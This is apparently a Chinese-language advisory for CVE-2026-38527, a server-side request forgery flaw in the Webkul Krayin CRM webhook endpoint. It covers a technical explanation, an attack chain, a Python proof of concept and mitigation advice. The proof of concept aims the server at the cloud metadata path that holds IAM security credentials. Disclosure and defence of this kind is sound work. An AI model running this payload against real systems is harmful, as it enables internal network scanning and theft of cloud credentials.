CVE-2026-38527 CVSS 8.5 高危

CVE-2026-38527 Webkul Krayin CRM SSRF漏洞

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-38527

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Webkul Krayin CRM

漏洞概述

Webkul Krayin CRM v2.2.x存在服务端请求伪造漏洞。攻击者可利用/settings/webhooks/create接口，通过构造恶意POST请求诱导服务器扫描内网资源，造成敏感信息泄露。

技术细节

该漏洞发生在Webkul Krayin CRM的Webhook创建功能模块中。漏洞的根本原因在于后端应用程序在处理来自用户的Webhook配置请求时，缺乏对目标URL的有效性校验。具体而言，当攻击者向 `/settings/webhooks/create` 端点发送POST请求时，应用直接提取请求体中的URL参数，并由服务器端发起HTTP请求进行测试或配置。攻击者可以将URL参数替换为内网地址（例如 `http://127.0.0.1:8080` 或云厂商的元数据服务地址 `http://169.254.169.254/latest/meta-data/`）。由于请求是由服务器端发起的，它通常拥有访问内网资源的权限，且能够绕过网络边界防火墙对入站流量的限制。成功利用此漏洞后，攻击者不仅能扫描内网拓扑结构，还能结合其他漏洞对内网服务进行攻击，导致严重的数据泄露风险。

攻击链分析

STEP 1

侦察

识别运行Webkul Krayin CRM v2.2.x的目标系统。

STEP 2

获取访问权限

获取低权限用户账号凭证（PR:L要求），登录系统。

STEP 3

漏洞利用

向/settings/webhooks/create接口发送特制的POST请求，将URL参数设置为内网地址。

STEP 4

SSRF执行

服务器端解析请求并向内部网络资源发起HTTP连接。

STEP 5

信息收集

根据服务器响应或响应时间差异，判断内网端口开放情况或获取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests target_url = "http://victim-domain.com/settings/webhooks/create" # Note: Requires authentication (Low Privileges PR:L) session = requests.Session() # session.post("http://victim-domain.com/login", data={"email": "[email protected]", "password": "password"}) # Internal target to scan (e.g., AWS metadata service) internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" payload = { "url": internal_target, "event_type": "order_created" } response = session.post(target_url, data=payload) if response.status_code == 200: print("SSRF request sent successfully. Check response time/content for clues.") else: print(f"Failed to send request: {response.status_code}")

影响范围

Webkul Krayin CRM v2.2.x

防御指南

临时缓解措施

建议立即升级到修复了该漏洞的最新版本。如果无法立即升级，应通过WAF（Web应用防火墙）拦截对 `/settings/webhooks/create` 的非法请求，或在网络层严格限制服务器对外网的出站连接，仅允许访问白名单内的域名。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表